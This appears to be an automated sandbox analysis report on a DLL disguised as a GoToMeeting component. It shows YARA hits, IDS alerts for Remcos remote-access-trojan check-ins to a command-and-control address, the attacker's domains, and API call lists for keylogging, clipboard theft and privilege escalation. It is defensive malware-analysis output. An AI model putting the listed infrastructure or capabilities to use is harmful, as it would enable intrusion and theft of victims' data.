Source: Yara match | File source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR

              Privilege Escalation

              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B074FD _wcslen,CoGetObject,12_2_02B074FD
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A074FD _wcslen,CoGetObject,15_2_02A074FD
              Source: 7P7cuKWTfN.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              Source: 7P7cuKWTfN.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
              Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.1_builds\output\G2M.pdb | source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_02B1C291
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09253
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_02B0C34D
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09665
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_02B19AF5
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_02B0BB30
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0783C FindFirstFileW,FindNextFileW,12_2_02B0783C
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_02B0880C
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_02B0BD37
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_02A1C291
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09253
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_02A0C34D
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09665
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_02A19AF5
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_02A0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0783C FindFirstFileW,FindNextFileW,15_2_02A0783C
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_02A0880C
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_02A0BD37
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B07C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_02B07C97

              Networking

              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49737 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49774 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49735 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49817 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49858 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49907 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49960 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50009 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50010 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50011 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50013 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50016 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50018 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50022 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50021 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50019 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50024 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50012 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50023 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50017 -> 193.233.18.18:5140
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50020 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50014 -> 193.233.18.18:4050
              Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:50015 -> 193.233.18.18:5140
              Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 193.233.18.18 5140
              Source: Malware configuration extractor | URLs: goatratedman.com
              Source: Malware configuration extractor | URLs: extendedbreakfast.com
              Source: global traffic | TCP traffic: 192.168.2.4:49735 -> 193.233.18.18:4050
              Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B04B96 WaitForSingleObject,SetEvent,recv,12_2_02B04B96
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: eCMD_URL_Set_manageMaterialsURL www.yahoo.com equals www.yahoo.com (Yahoo)
              Source: global traffic | DNS traffic detected: DNS query: goatratedman.com
              Source: global traffic | DNS traffic detected: DNS query: extendedbreakfast.com
              Source: rundll32.exe, regsvr32.exe | String found in binary or memory: http://geoplugin.net/json.gp
              Source: loaddll32.exe, 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, rundll32.exe, 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://support.gotomeeting.com/ics/support/default.asp?deptID=5641&task=knowledge&questionID=4517Lea
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.gotomeeting.comInetAPI::initializeForG2M()InetAPI::shutdown()..
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.openssl.org/support/faq.html
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.openssl.org/support/faq.html.....................
              Source: rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.vidsoft.de/xmlns/meetingcontrolprotocol
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2243028639.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.gotomeeting.comhttps://www.gotowebinar.comhttps://www.gototraining.comhwId

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0A2B8 SetWindowsHookExA 0000000D,02B0A2A4,00000000,12_2_02B0A2B8
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_02B0B70E
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_02B168C1
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_02A168C1
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0B70E OpenClipboard,GetClipboardData,CloseClipboard,12_2_02B0B70E
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_02B0A3E0

              E-Banking Fraud

              Source: Yara match | File source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPE
